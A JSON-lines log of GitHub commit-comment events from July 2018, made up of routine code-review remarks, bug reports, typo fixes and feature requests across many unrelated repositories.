{"id":"7941334026","type":"CommitCommentEvent","actor":{"login":"Armok628"},"repo":{"name":"Armok628/mogue3"},"payload":{"comment":{"id":29650677,"position":null,"line":null,"path":null,"commit_id":"6ba74dbd5374f26ead59aa6bcaf8e4eb9139530d","created_at":"2018-07-10T03:56:20Z","updated_at":"2018-07-10T03:56:20Z","author_association":"OWNER","body":"Also adjusted debug options (but forgot to write resurrect entity) and erosion algorithm"}},"created_at":"2018-07-10T03:56:20Z"}
{"id":"7941339563","type":"CommitCommentEvent","actor":{"login":"lockmachine"},"repo":{"name":"lockmachine/hello-world"},"payload":{"comment":{"id":29650685,"position":2,"line":2,"path":"README.md","commit_id":"c286c0522f49ccfde10b86b78711cbc50c25f65c","created_at":"2018-07-10T03:58:31Z","updated_at":"2018-07-10T03:58:31Z","author_association":"OWNER","body":"delete discription"}},"created_at":"2018-07-10T03:58:31Z"}
{"id":"7941340125","type":"CommitCommentEvent","actor":{"login":"Aroundme12"},"repo":{"name":"pojome/elementor"},"payload":{"comment":{"id":29650688,"position":null,"line":null,"path":null,"commit_id":"e5899bb0426c88a3a1432185f0e5184d2fdb25d1","created_at":"2018-07-10T03:58:45Z","updated_at":"2018-07-10T03:58:45Z","author_association":"NONE","body":"not sure where I post this but was told to come here by elementor support. The animations only seem to work once after the page is loaded. I would like to have the animations work every time a section is scroll over without having to reload the page. Here's an example https://screencast-o-matic.com/watch/cFii6iFw8g\r\n\r\nYou can see the animation works on the about us page each time you scroll over it. Currently the animations does not provide this feature. Can someone point me in the right direction. Thanks"}},"created_at":"2018-07-10T03:58:45Z"}
{"id":"7941351216","type":"CommitCommentEvent","actor":{"login":"tallpants"},"repo":{"name":"captn3m0/ideas"},"payload":{"comment":{"id":29650710,"position":null,"line":null,"path":null,"commit_id":"2a755674ddf568fbf2c04e5709cd4261b7f7261a","created_at":"2018-07-10T04:03:16Z","updated_at":"2018-07-10T04:03:16Z","author_association":"NONE","body":"♥️"}},"created_at":"2018-07-10T04:03:16Z"}
{"id":"7941351676","type":"CommitCommentEvent","actor":{"login":"xiecancn"},"repo":{"name":"TjWallas/dynamic-netsec"},"payload":{"comment":{"id":29650712,"position":5,"line":5,"path":"vagrant/registrator.sh","commit_id":"28677db1d8491c210c6af6a831409223880b330e","created_at":"2018-07-10T04:03:28Z","updated_at":"2018-07-10T04:03:28Z","author_association":"COLLABORATOR","body":"\"tunnelIp\", misspelling"}},"created_at":"2018-07-10T04:03:28Z"}
{"id":"7941355627","type":"CommitCommentEvent","actor":{"login":"argowang"},"repo":{"name":"argowang/CodeOfDuty"},"payload":{"comment":{"id":29650717,"position":8,"line":8,"path":"20180709/TransposeMatrix.java","commit_id":"238388ea4bf464f3c58cbf6825537628615ad3b6","created_at":"2018-07-10T04:05:09Z","updated_at":"2018-07-10T04:05:09Z","author_association":"OWNER","body":"Could you initialize result before the previous if statement? That way you don't need the line int[][] res = {{}}; \r\nand you can return result directly."}},"created_at":"2018-07-10T04:05:09Z"}
{"id":"7941355875","type":"CommitCommentEvent","actor":{"login":"witgo"},"repo":{"name":"Alluxio/alluxio"},"payload":{"comment":{"id":29650718,"position":61,"line":61,"path":"docs/cn/Journal.md","commit_id":"81327262929cb1c8c3d282e321ac308982ef67f4","created_at":"2018-07-10T04:05:14Z","updated_at":"2018-07-10T04:05:14Z","author_association":"NONE","body":"`典故` -> `故障`"}},"created_at":"2018-07-10T04:05:14Z"}
{"id":"7941356450","type":"CommitCommentEvent","actor":{"login":"ifyour"},"repo":{"name":"ifyour/ifyour.github.io"},"payload":{"comment":{"id":29650722,"position":null,"line":null,"path":null,"commit_id":"fc469d1c81beb1749906925dde30814ad6e9872d","created_at":"2018-07-10T04:05:29Z","updated_at":"2018-07-10T04:05:29Z","author_association":"OWNER","body":"可以使用 **节流函数** 进一步优化, 避免无效计算:\r\n\r\n```js\r\nfunction throttle(fn, interval = 300) {\r\n    let canRun = true;\r\n    return function () {\r\n        if (!canRun) return;\r\n        canRun = false;\r\n        setTimeout(() => {\r\n            fn.apply(this, arguments);\r\n            canRun = true;\r\n        }, interval);\r\n    };\r\n}\r\n```\r\n* 300ms 计算一次, 非实时计算\r\n* 这是节流函数的简单实现, 关于节流函数可以参考[这篇文章](https://github.com/mqyqingfeng/Blog/issues/26)"}},"created_at":"2018-07-10T04:05:29Z"}
{"id":"7941359811","type":"CommitCommentEvent","actor":{"login":"nhalstead"},"repo":{"name":"pushthis/pushthis-php-http"},"payload":{"comment":{"id":29650727,"position":null,"line":null,"path":null,"commit_id":"e767b3fa34b36679247d17a364a6ab98fa14774a","created_at":"2018-07-10T04:06:56Z","updated_at":"2018-07-10T04:06:56Z","author_association":"COLLABORATOR","body":"More Updates are still in order from e767b3f commit."}},"created_at":"2018-07-10T04:06:56Z"}
{"id":"7941361920","type":"CommitCommentEvent","actor":{"login":"nguyenhoangcung"},"repo":{"name":"nguyenhoangcung/redis-queue"},"payload":{"comment":{"id":29650729,"position":null,"line":null,"path":null,"commit_id":"8e38216b60c647560b5bd20eeeeff81ed13349b3","created_at":"2018-07-10T04:07:55Z","updated_at":"2018-07-10T04:07:55Z","author_association":"OWNER","body":"When disconnected, client connect mqtt broker that will be loop for reconnect until connection success"}},"created_at":"2018-07-10T04:07:55Z"}
{"id":"7941362087","type":"CommitCommentEvent","actor":{"login":"argowang"},"repo":{"name":"argowang/CodeOfDuty"},"payload":{"comment":{"id":29650730,"position":13,"line":13,"path":"20180709/TransposeMatrix.java","commit_id":"238388ea4bf464f3c58cbf6825537628615ad3b6","created_at":"2018-07-10T04:07:59Z","updated_at":"2018-07-10T04:07:59Z","author_association":"OWNER","body":"I believe you can get the transpose done in one pass. For example, over here you could have a new List of List B which has size [N, M] and we do B[col][row] = A[row][col];"}},"created_at":"2018-07-10T04:07:59Z"}
{"id":"7941362263","type":"CommitCommentEvent","actor":{"login":"nhalstead"},"repo":{"name":"pushthis/pushthis-php-http"},"payload":{"comment":{"id":29650732,"position":null,"line":null,"path":null,"commit_id":"e767b3fa34b36679247d17a364a6ab98fa14774a","created_at":"2018-07-10T04:08:05Z","updated_at":"2018-07-10T04:08:05Z","author_association":"COLLABORATOR","body":"https://github.com/pushthis/pushthis-php-http/projects/2#card-11201173"}},"created_at":"2018-07-10T04:08:05Z"}
{"id":"7941364008","type":"CommitCommentEvent","actor":{"login":"jhaynie"},"repo":{"name":"pinpt/agent"},"payload":{"comment":{"id":29650736,"position":null,"line":null,"path":null,"commit_id":"b1e42c889f25f2d7640f3ff64a3612b1cd6b794f","created_at":"2018-07-10T04:08:49Z","updated_at":"2018-07-10T04:08:49Z","author_association":"MEMBER","body":"Should update info command too"}},"created_at":"2018-07-10T04:08:49Z"}
{"id":"7941365148","type":"CommitCommentEvent","actor":{"login":"rachit173"},"repo":{"name":"MRPT/mrpt-web"},"payload":{"comment":{"id":29650740,"position":null,"line":null,"path":null,"commit_id":"89018706390beb3c4cc03e2bd92a498f966415e2","created_at":"2018-07-10T04:09:19Z","updated_at":"2018-07-10T04:09:19Z","author_association":"NONE","body":"There is a simple way xs.length, I did it for completeness. But it can be removed."}},"created_at":"2018-07-10T04:09:19Z"}
{"id":"7941372766","type":"CommitCommentEvent","actor":{"login":"jacobpennington"},"repo":{"name":"LBHB/nems_db"},"payload":{"comment":{"id":29650746,"position":null,"line":null,"path":null,"commit_id":"c585ef985ce54e40e2002a0ad33984e0e34c5d6c","created_at":"2018-07-10T04:12:36Z","updated_at":"2018-07-10T04:12:36Z","author_association":"CONTRIBUTOR","body":"@crheller those are still using the logic from the old codebase, which shouldn't be in master anymore. "}},"created_at":"2018-07-10T04:12:36Z"}
{"id":"7941374775","type":"CommitCommentEvent","actor":{"login":"xconverge"},"repo":{"name":"VSCodeVim/Vim"},"payload":{"comment":{"id":29650749,"position":null,"line":null,"path":null,"commit_id":"59e29c143ab1942715ee27556f63fd57c564b8b5","created_at":"2018-07-10T04:13:28Z","updated_at":"2018-07-10T04:13:28Z","author_association":"MEMBER","body":"@jpoon can you review this, accidentally went to master, and it had some questionable stuff I wanted you to take a peek at..."}},"created_at":"2018-07-10T04:13:28Z"}
{"id":"7941394015","type":"CommitCommentEvent","actor":{"login":"Moneypulation"},"repo":{"name":"jaywcjlove/awesome-mac"},"payload":{"comment":{"id":29650799,"position":null,"line":null,"path":null,"commit_id":"5a6eb0b5bd8bddd33e921b7118b0dd684147413f","created_at":"2018-07-10T04:21:32Z","updated_at":"2018-07-10T04:21:32Z","author_association":"NONE","body":"Hey, I'd like to add my project iGlance to this list since I think it is a pretty cool menu bar tool. I think some people would find it useful too. It's free and open source"}},"created_at":"2018-07-10T04:21:32Z"}
{"id":"7941397214","type":"CommitCommentEvent","actor":{"login":"tiago1998"},"repo":{"name":"tiago1998/hellow"},"payload":{"comment":{"id":29650807,"position":null,"line":null,"path":null,"commit_id":"993574d47519c07a4581fa2943fc7d81a42b2ef5","created_at":"2018-07-10T04:22:54Z","updated_at":"2018-07-10T04:22:54Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-10T04:22:54Z"}
{"id":"7941399040","type":"CommitCommentEvent","actor":{"login":"moderation"},"repo":{"name":"browsh-org/browsh"},"payload":{"comment":{"id":29650810,"position":null,"line":null,"path":null,"commit_id":"c415547c5bf8215e0d76e0a624801f2390ad772c","created_at":"2018-07-10T04:23:42Z","updated_at":"2018-07-10T04:23:42Z","author_association":"NONE","body":"Would you consider adding ARMv8 binaries as well? I think this would just be the addition of `- arm64`"}},"created_at":"2018-07-10T04:23:42Z"}
{"id":"7941424382","type":"CommitCommentEvent","actor":{"login":"Benau"},"repo":{"name":"supertuxkart/stk-code"},"payload":{"comment":{"id":29650843,"position":null,"line":null,"path":null,"commit_id":"8a25edf2cce915f04319139aa7b898d3737c390c","created_at":"2018-07-10T04:34:13Z","updated_at":"2018-07-10T04:34:13Z","author_association":"MEMBER","body":"lol devetest2 works"}},"created_at":"2018-07-10T04:34:13Z"}
{"id":"7941424825","type":"CommitCommentEvent","actor":{"login":"sthalik"},"repo":{"name":"soryy708/BigAlloc"},"payload":{"comment":{"id":29650844,"position":null,"line":null,"path":null,"commit_id":"91425dc34f217f3922fa5aaa0f0d4e356b2ba640","created_at":"2018-07-10T04:34:26Z","updated_at":"2018-07-10T04:34:26Z","author_association":"NONE","body":"Hey bro,\r\n\r\nI respect you and don't mean to patronize you by any means, just share some stuff I found out over the years. Silly programming, sucks for extroverts.\r\n\r\nThe concept's not quite right. Look into the concepts of [block allocation](https://en.wikipedia.org/wiki/Memory_pool), [RAII dynamic-scope allocation](https://en.wikipedia.org/wiki/Region-based_memory_management), and [zone allocation](https://www.freebsd.org/cgi/man.cgi?query=uma&sektion=9).\r\n\r\nThere's also [a site that I found](http://www.memorymanagement.org/) that has lotsa' useful stuff. Wonder why it has so low pagerank. 😢\r\n\r\nIn short, the concepts have been done better decades ago. My approach is to look for prior art first. You can NIH the old concepts too.\r\n\r\nHeap allocation isn't \"slow\" or \"fragmenting\" per se. You can `mmap` or Windows equivalent pages worth of stuff and block-allocate with a bitmap. Allocations are best done in pages. Just remember about required alignment!\r\n"}},"created_at":"2018-07-10T04:34:26Z"}
{"id":"7941440507","type":"CommitCommentEvent","actor":{"login":"jhdpco"},"repo":{"name":"joyoyao/superCleanMaster"},"payload":{"comment":{"id":29650866,"position":null,"line":null,"path":null,"commit_id":"fd2d7deef78abd07cf320f1c85c54cc2ffc86a71","created_at":"2018-07-10T04:40:53Z","updated_at":"2018-07-10T04:40:53Z","author_association":"NONE","body":"Hello joyoyao,\r\nI can't understand \"Self-start management\" functioanlity.\r\nPlease explain me "}},"created_at":"2018-07-10T04:40:53Z"}
{"id":"7941442758","type":"CommitCommentEvent","actor":{"login":"beyondgfw"},"repo":{"name":"googlehosts/hosts"},"payload":{"comment":{"id":29650867,"position":6,"line":21,"path":"README.md","commit_id":"27818e18accf4b8c90f5e8119a0b925d22178248","created_at":"2018-07-10T04:41:49Z","updated_at":"2018-07-10T04:41:49Z","author_association":"MEMBER","body":"@zhshaohui 我们不对 laod 的行为负责，也没有完全 review 它的更改，所以这个问题无法给出完整答案"}},"created_at":"2018-07-10T04:41:49Z"}
{"id":"7941449234","type":"CommitCommentEvent","actor":{"login":"kraj"},"repo":{"name":"agherzan/meta-raspberrypi"},"payload":{"comment":{"id":29650883,"position":null,"line":null,"path":null,"commit_id":"e713c3f60d74fbb864122f8f11a80ca302d53da3","created_at":"2018-07-10T04:44:30Z","updated_at":"2018-07-10T04:44:30Z","author_association":"COLLABORATOR","body":"This patch helps but weston shows more errors in any case revert of this patch is needed.\r\n\r\n```\r\n../weston-4.0.0/libweston/gl-renderer.c: In function 'gl_format_from_internal':\r\n../weston-4.0.0/libweston/gl-renderer.c:1405:10: error: 'GL_RED_EXT' undeclared (first use in this function); did you mean 'GL_R8_EXT'?\r\n   return GL_RED_EXT;\r\n          ^~~~~~~~~~\r\n          GL_R8_EXT\r\n../weston-4.0.0/libweston/gl-renderer.c:1405:10: note: each undeclared identifier is reported only once for each function it appears in\r\n../weston-4.0.0/libweston/gl-renderer.c:1407:10: error: 'GL_RG_EXT' undeclared (first use in this function); did you mean 'GL_R8_EXT'?\r\n   return GL_RG_EXT;\r\n          ^~~~~~~~~\r\n          GL_R8_EXT\r\n```"}},"created_at":"2018-07-10T04:44:30Z"}
{"id":"7941451284","type":"CommitCommentEvent","actor":{"login":"DashingTutus"},"repo":{"name":"DashingTutus/LastO"},"payload":{"comment":{"id":29650887,"position":null,"line":null,"path":null,"commit_id":"0751a8e548206ee2db7608d1caa2e642a8d3ce9c","created_at":"2018-07-10T04:45:20Z","updated_at":"2018-07-10T04:45:20Z","author_association":"OWNER","body":"change initiation"}},"created_at":"2018-07-10T04:45:20Z"}
{"id":"7941451771","type":"CommitCommentEvent","actor":{"login":"ilovezfs"},"repo":{"name":"Homebrew/brew"},"payload":{"comment":{"id":29650890,"position":null,"line":null,"path":null,"commit_id":"2f181b3f41487c0c2c4459e3dfb5a9e3d256eccb","created_at":"2018-07-10T04:45:30Z","updated_at":"2018-07-10T04:45:30Z","author_association":"MEMBER","body":"@keyurp1987 thanks for reporting this. It's now fixed. In the future, please open an issue and fill out the issue template to make sure your observations don't escape our notice."}},"created_at":"2018-07-10T04:45:30Z"}
{"id":"7941455396","type":"CommitCommentEvent","actor":{"login":"shinsei1020"},"repo":{"name":"shinsei1020/my_robo"},"payload":{"comment":{"id":29650896,"position":null,"line":null,"path":null,"commit_id":"e48d54e69a78b09c3fea135134578b0bb466829f","created_at":"2018-07-10T04:47:06Z","updated_at":"2018-07-10T04:47:06Z","author_association":"OWNER","body":"追記：使わないプログラムをdisuse_srcに入れた。\r\nそれに伴いCMakeListsを編集した。"}},"created_at":"2018-07-10T04:47:06Z"}
{"id":"7941455509","type":"CommitCommentEvent","actor":{"login":"sanga17"},"repo":{"name":"sagarsaindre/Ruby_assignments"},"payload":{"comment":{"id":29650898,"position":18,"line":18,"path":"assignment_2.rb","commit_id":"53a15e354278ef1a2a45ea5b20a6473bee2b5d4f","created_at":"2018-07-10T04:47:09Z","updated_at":"2018-07-10T04:47:09Z","author_association":"NONE","body":"We need to delete and then show elements"}},"created_at":"2018-07-10T04:47:09Z"}
{"id":"7941459311","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29650905,"position":57,"line":65,"path":"Source/Foundation/bsfCore/Profiling/BsProfilerGPU.cpp","commit_id":"644a0743f7b59b17e75904d040418b6d02413107","created_at":"2018-07-10T04:48:49Z","updated_at":"2018-07-10T04:48:49Z","author_association":"CONTRIBUTOR","body":"Another move vs. copy for the parameter situation. Always tough to know what the right balance is, might be worth taking the parameter by value, since in the hot-path you'll move, even though the slow path (if(!mIsFrameActive)) would be a bit less efficent."}},"created_at":"2018-07-10T04:48:49Z"}
{"id":"7941459661","type":"CommitCommentEvent","actor":{"login":"sanga17"},"repo":{"name":"sagarsaindre/Ruby_assignments"},"payload":{"comment":{"id":29650907,"position":34,"line":34,"path":"assignment_2.rb","commit_id":"53a15e354278ef1a2a45ea5b20a6473bee2b5d4f","created_at":"2018-07-10T04:48:57Z","updated_at":"2018-07-10T04:48:57Z","author_association":"NONE","body":"Where is answer ? "}},"created_at":"2018-07-10T04:48:57Z"}
{"id":"7941466564","type":"CommitCommentEvent","actor":{"login":"Stoner609"},"repo":{"name":"ReactStudyGroup/onlinereadbook"},"payload":{"comment":{"id":29650915,"position":null,"line":null,"path":null,"commit_id":"4f03ee74abf2aa254e2f5f37636a7f54e9966416","created_at":"2018-07-10T04:52:00Z","updated_at":"2018-07-10T04:52:00Z","author_association":"NONE","body":"蝦皮有什好講的"}},"created_at":"2018-07-10T04:52:00Z"}
{"id":"7941467774","type":"CommitCommentEvent","actor":{"login":"dongming33333"},"repo":{"name":"EOSVR/EOSVR"},"payload":{"comment":{"id":29650917,"position":null,"line":null,"path":null,"commit_id":"b624c8aeb4b8b866d73452c7358c0ddbc99ac34a","created_at":"2018-07-10T04:52:30Z","updated_at":"2018-07-10T04:52:30Z","author_association":"NONE","body":"\n网址还是：https://github.com/EOSVR/EOSVR/blob/master/wallet-cn.md？？\n\n\n\n\n    \n    \n    \n\n\n\n    \n        \n            \n                \n                    \n                        \n                    \n                    \n                        \n                            316253432\n                            \n                            \n                                \n                                    邮箱：316253432@qq.com\n                                \n                        \n                    \n                \n            \n        \n    \n\n\nSignature is customized by Netease Mail Master\nOn 07/10/2018 07:21, dongming33333 wrote: \n更新迭代很快，点赞\n\n\n\n\n    \n    \n    \n\n\n\n    \n        \n            \n                \n                    \n                        \n                    \n                    \n                        \n                            316253432\n                            \n                            \n                                \n                                    邮箱：316253432@qq.com\n                                \n                        \n                    \n                \n            \n        \n    \n\n\nSignature is customized by Netease Mail Master\nOn 07/10/2018 04:12, wsdfz wrote: 旧版本那个按钮有bug。刚上传的新版已经修复了。目前的demo版更新都要把之前的删了再下载，所以更新前务必备份好私钥（用的帐号、密码模式就不用）。另外，冷钱包不用更新。\n\n—You are receiving this because you commented.Reply to this email directly, view it on GitHub, or mute the thread.\n{\"api_version\":\"1.0\",\"publisher\":{\"api_key\":\"05dde50f1d1a384dd78767c55493e4bb\",\"name\":\"GitHub\"},\"entity\":{\"external_key\":\"github/EOSVR/EOSVR\",\"title\":\"EOSVR/EOSVR\",\"subtitle\":\"GitHub repository\",\"main_image_url\":\"https://assets-cdn.github.com/images/email/message_cards/header.png\",\"avatar_image_url\":\"https://assets-cdn.github.com/images/email/message_cards/avatar.png\",\"action\":{\"name\":\"Open in GitHub\",\"url\":\"https://github.com/EOSVR/EOSVR\"}},\"updates\":{\"snippets\":[{\"icon\":\"PERSON\",\"message\":\"@wsdfz on b624c8a: 旧版本那个按钮有bug。刚上传的新版已经修复了。目前的demo版更新都要把之前的删了再下载，所以更新前务必备份好私钥（用的帐号、密码模式就不用）。另外，冷钱包不用更新。\"}],\"action\":{\"name\":\"View Commit\",\"url\":\"https://github.com/EOSVR/EOSVR/commit/b624c8aeb4b8b866d73452c7358c0ddbc99ac34a#commitcomment-29647070\"}}}\n[\n{\n\"@context\": \"http://schema.org\",\n\"@type\": \"EmailMessage\",\n\"potentialAction\": {\n\"@type\": \"ViewAction\",\n\"target\": \"https://github.com/EOSVR/EOSVR/commit/b624c8aeb4b8b866d73452c7358c0ddbc99ac34a#commitcomment-29647070\",\n\"url\": \"https://github.com/EOSVR/EOSVR/commit/b624c8aeb4b8b866d73452c7358c0ddbc99ac34a#commitcomment-29647070\",\n\"name\": \"View Commit\"\n},\n\"description\": \"View this Commit on GitHub\",\n\"publisher\": {\n\"@type\": \"Organization\",\n\"name\": \"GitHub\",\n\"url\": \"https://github.com\"\n}\n}\n]"}},"created_at":"2018-07-10T04:52:30Z"}
{"id":"7941469703","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29650923,"position":117,"line":199,"path":"Source/Foundation/bsfCore/Profiling/BsProfilerGPU.h","commit_id":"644a0743f7b59b17e75904d040418b6d02413107","created_at":"2018-07-10T04:53:24Z","updated_at":"2018-07-10T04:53:24Z","author_association":"CONTRIBUTOR","body":"I'd actually recommend changing the entire constructor for the #if block.\r\n\r\nIf profiling is *not* enabled, you'd want to accept the parameter by const&, so that the caller doesn't pay the cost of passing the param by value. But if profiling is enabled, passing by value and moving to the member variable is still better."}},"created_at":"2018-07-10T04:53:24Z"}
{"id":"7941471412","type":"CommitCommentEvent","actor":{"login":"akchalasani1"},"repo":{"name":"akchalasani1/platform"},"payload":{"comment":{"id":29650926,"position":null,"line":null,"path":null,"commit_id":"406eebbb15bde4b7c779742374568a55f6deb15b","created_at":"2018-07-10T04:54:06Z","updated_at":"2018-07-10T04:54:06Z","author_association":"OWNER","body":"first"}},"created_at":"2018-07-10T04:54:06Z"}
{"id":"7941472132","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29650931,"position":125,"line":207,"path":"Source/Foundation/bsfCore/Profiling/BsProfilerGPU.h","commit_id":"644a0743f7b59b17e75904d040418b6d02413107","created_at":"2018-07-10T04:54:25Z","updated_at":"2018-07-10T04:54:25Z","author_association":"CONTRIBUTOR","body":"You could actually enclose the entire destructor in the #if block. The compiler will auto-generate one for you. "}},"created_at":"2018-07-10T04:54:25Z"}
{"id":"7941472187","type":"CommitCommentEvent","actor":{"login":"ItzelRV"},"repo":{"name":"ItzelRV/Proyecto_Modulo3"},"payload":{"comment":{"id":29650932,"position":null,"line":null,"path":null,"commit_id":"3f679a8205810e3b74223a37b7ea94225b4a501b","created_at":"2018-07-10T04:54:26Z","updated_at":"2018-07-10T04:54:26Z","author_association":"OWNER","body":"holaaa"}},"created_at":"2018-07-10T04:54:26Z"}
{"id":"7941472879","type":"CommitCommentEvent","actor":{"login":"thaimageplaza"},"repo":{"name":"thaimageplaza/laravel_shop"},"payload":{"comment":{"id":29650933,"position":1,"line":1,"path":"README.md","commit_id":"e0be273c46bf131214e1f43ccc46059b898cd93a","created_at":"2018-07-10T04:54:45Z","updated_at":"2018-07-10T04:54:45Z","author_association":"OWNER","body":"Create by Nguyen Cong Thai (Eric Nguyen)"}},"created_at":"2018-07-10T04:54:45Z"}
{"id":"7941473100","type":"CommitCommentEvent","actor":{"login":"darlaker"},"repo":{"name":"awsdocs/aws-codepipeline-user-guide"},"payload":{"comment":{"id":29650934,"position":null,"line":null,"path":null,"commit_id":"d43bf53a6635f0bde7dbc648f8b3ed685302da4f","created_at":"2018-07-10T04:54:50Z","updated_at":"2018-07-10T04:54:50Z","author_association":"CONTRIBUTOR","body":"Hello @Jumblemuddle , I see - the version of the service was not showing the feature yet. I thought it might be a repository version question. Thank you - glad that helps!"}},"created_at":"2018-07-10T04:54:50Z"}
{"id":"7941475708","type":"CommitCommentEvent","actor":{"login":"lrinQVQ"},"repo":{"name":"googlehosts/hosts"},"payload":{"comment":{"id":29650939,"position":6,"line":21,"path":"README.md","commit_id":"27818e18accf4b8c90f5e8119a0b925d22178248","created_at":"2018-07-10T04:55:59Z","updated_at":"2018-07-10T04:55:59Z","author_association":"CONTRIBUTOR","body":"@zhshaohui 我们没有添加过任何VS2017相关的域名欸XD 其他见楼上"}},"created_at":"2018-07-10T04:55:59Z"}
{"id":"7941476667","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29650941,"position":13,"line":99,"path":"Source/Foundation/bsfCore/Renderer/BsRenderer.cpp","commit_id":"644a0743f7b59b17e75904d040418b6d02413107","created_at":"2018-07-10T04:56:23Z","updated_at":"2018-07-10T04:56:23Z","author_association":"CONTRIBUTOR","body":"Good candidate for \r\n\r\n\"Immediately executed function expression\".\r\n\r\nconst bool complete = [&](void)\r\n{\r\n    ProfileGPUBlock sampleBlock(\"Renderer task: \"+ ProfilerString(entry->mName.data(), entry->mName.size()));\r\n    return complete = entry->mTaskWorker();\r\n}(); //<- Call immediately."}},"created_at":"2018-07-10T04:56:23Z"}
{"id":"7941477046","type":"CommitCommentEvent","actor":{"login":"thaimageplaza"},"repo":{"name":"thaimageplaza/laravel_shop"},"payload":{"comment":{"id":29650942,"position":1,"line":1,"path":"README.md","commit_id":"e0be273c46bf131214e1f43ccc46059b898cd93a","created_at":"2018-07-10T04:56:34Z","updated_at":"2018-07-10T04:56:34Z","author_association":"OWNER","body":"Eric Thai"}},"created_at":"2018-07-10T04:56:34Z"}
{"id":"7941479069","type":"CommitCommentEvent","actor":{"login":"MBaltz"},"repo":{"name":"Sekva/webPro"},"payload":{"comment":{"id":29650945,"position":null,"line":null,"path":null,"commit_id":"341b52e05649d2fc87470bfdd19c5c4802ab193a","created_at":"2018-07-10T04:57:26Z","updated_at":"2018-07-10T04:57:26Z","author_association":"COLLABORATOR","body":"Ademais, diagramaER atualizado. E fiz uma pequena modificação no .mwb, mas n sei tirar do commit, então, vai assim mesmo '-' \r\n\r\n@Sekva "}},"created_at":"2018-07-10T04:57:26Z"}
{"id":"7941479121","type":"CommitCommentEvent","actor":{"login":"felirangelp"},"repo":{"name":"felirangelp/stack"},"payload":{"comment":{"id":29650946,"position":2,"line":2,"path":"README.md","commit_id":"c08eb0758eb55819e070eedba2c79eb511e0919e","created_at":"2018-07-10T04:57:28Z","updated_at":"2018-07-10T04:57:28Z","author_association":"OWNER","body":"Esta buena la definición de la pila"}},"created_at":"2018-07-10T04:57:28Z"}
{"id":"7941481705","type":"CommitCommentEvent","actor":{"login":"dongming33333"},"repo":{"name":"EOSVR/EOSVR"},"payload":{"comment":{"id":29650948,"position":null,"line":null,"path":null,"commit_id":"b624c8aeb4b8b866d73452c7358c0ddbc99ac34a","created_at":"2018-07-10T04:58:35Z","updated_at":"2018-07-10T04:58:35Z","author_association":"NONE","body":"https://github.com/EOSVR/EOSVR/blob/master/wallet-cn.md，在这个网页下载钱包了，但是资源管理的页面没有“手动回款”这个按键"}},"created_at":"2018-07-10T04:58:35Z"}
{"id":"7941481942","type":"CommitCommentEvent","actor":{"login":"kataras"},"repo":{"name":"Landoop/tableprinter"},"payload":{"comment":{"id":29650949,"position":34,"line":355,"path":"tableprinter.go","commit_id":"7d384d02b5c92fe6900adb5f66e335bff326add2","created_at":"2018-07-10T04:58:41Z","updated_at":"2018-07-10T04:58:41Z","author_association":"COLLABORATOR","body":"see https://github.com/Landoop/tableprinter/commit/e5c4f07d51dc8c99f9c936f0a40065b51a9f50ba"}},"created_at":"2018-07-10T04:58:41Z"}
{"id":"7941483492","type":"CommitCommentEvent","actor":{"login":"fascynacja"},"repo":{"name":"Nasichael/LibraryWithSpring"},"payload":{"comment":{"id":29650950,"position":14,"line":20,"path":"src/main/java/org/halas/agnieszka/library/LibraryApplication.java","commit_id":"c62b96c76906288c437e1e0da8e302c058fe9f70","created_at":"2018-07-10T04:59:21Z","updated_at":"2018-07-10T04:59:21Z","author_association":"COLLABORATOR","body":"hej\r\nchyba zapomnialas scomitowac UserRepository ?:)"}},"created_at":"2018-07-10T04:59:21Z"}
{"id":"7941483806","type":"CommitCommentEvent","actor":{"login":"obiot"},"repo":{"name":"melonjs/melonJS"},"payload":{"comment":{"id":29650951,"position":null,"line":null,"path":null,"commit_id":"b1b43279154429e8aa4fa5afa29eddcd10bd19cc","created_at":"2018-07-10T04:59:31Z","updated_at":"2018-07-10T04:59:31Z","author_association":"MEMBER","body":"#933 "}},"created_at":"2018-07-10T04:59:31Z"}
{"id":"7941489791","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"art102/black_jack"},"payload":{"comment":{"id":29650964,"position":null,"line":null,"path":null,"commit_id":"35e95248d83ceddc74c54ec35dad558f6481473f","created_at":"2018-07-10T05:01:47Z","updated_at":"2018-07-10T05:01:47Z","author_association":"NONE","body":"комитов очень много )  в коде писать неудобно\r\nбуду писать здесь\r\n\r\n1. файл `main.rb`\r\n    - правильней было бы не Гейм передавать в Интерфейс, а наборот... как бы Гейм - это главный класс, класс несущий исполнение программы, а Интрефейс - обслуживающий, т.е. строки 12 и 13 должны как-то наоборот выглядеть ))\r\n    - конечно же в теле файла не должно быть никакого кода, кроме строк 1 - 5 и 12, 13... плюс вызов метода, который у инстанса класса Гейм запустит исполнение... у тебя же прямо в теле файла и методы интерфейса, и методы рантайма... \r\n2. класс Интерфейс\r\n    - в методе `next_game_request` явно присутствует логика, которая должна быть в классе Гейм - проверка `if game.players_bank_zero?`... этим не должен заниматься Интерфейс\r\n3. класс Гейм\r\n    - будет правильно, если  у Гейм останется только один публичный метод, который ты и вызовешь из \"мейн\", остальные нужно сделать приватными\r\n    - нужно сделать явными вызовы методов интерфейса (примерно так, как у тебя интерфейс вызывается сейчас из \"мейн\")... т.е. типа `@interface.print_something(agrs)`\r\n    - все \"валютные операции\" лучше вынести в отдельный класс, к примеру Банк или Аккаунтер... этот класс сможет хранить деньги текущей игры и проводить все рассчты... т.е. предлагаю переписать вызовы типа `player.withdraw(BET)` во что-то типа `bank.take_bet(player)`\r\n    - чтобы не путать банк игры и деньги игроков, можно у игроков переименовать переменную в \"мани\" или \"кэш\"\r\n    - проверки из 87 строки явно просятся в отдельные методы с подходящими названиями\r\n"}},"created_at":"2018-07-10T05:01:47Z"}
